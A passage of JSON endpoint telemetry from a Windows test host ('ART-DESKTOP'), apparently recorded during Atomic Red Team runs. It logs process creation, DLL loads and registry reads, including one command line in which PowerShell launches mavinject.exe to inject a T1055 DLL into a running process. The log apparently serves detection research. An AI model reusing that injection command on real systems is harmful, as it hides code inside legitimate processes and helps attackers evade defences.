"{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "process", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "subtype": "terminate", - "timestamp": 131883573503230000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "file", - "file_name": "TEMPTCM.TMP-3991A72E.pf", - "file_path": "C:\\Windows\\Prefetch\\TEMPTCM.TMP-3991A72E.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573503230000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "process", - "pid": 5572, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573503230000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" - }, - { - "event_type": "process", - "pid": 1852, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573503390000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7708, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573503510000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573503390000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573503390000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573503390000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573503390000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573503540000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" - }, - { - "event_type": "process", - "pid": 7708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573503540000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573504480000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573504480000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573504640000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573504640000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573504640000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573504640000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573504640000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573549480000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573549480000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573549480000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "file", - "file_name": "SVCHOST.EXE-7F44DDFD.pf", - "file_path": "C:\\Windows\\Prefetch\\SVCHOST.EXE-7F44DDFD.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573557450016, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\mavinject.exe\" 7036 /INJECTRUNNING C:\\AtomicRedTeam\\atomics\\T1055\\src\\x64\\T1055.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7792, - "ppid": 7036, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "subtype": "create", - "timestamp": 131883573570600000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "mavinject.exe", - "image_path": "C:\\Windows\\System32\\mavinject.exe", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": 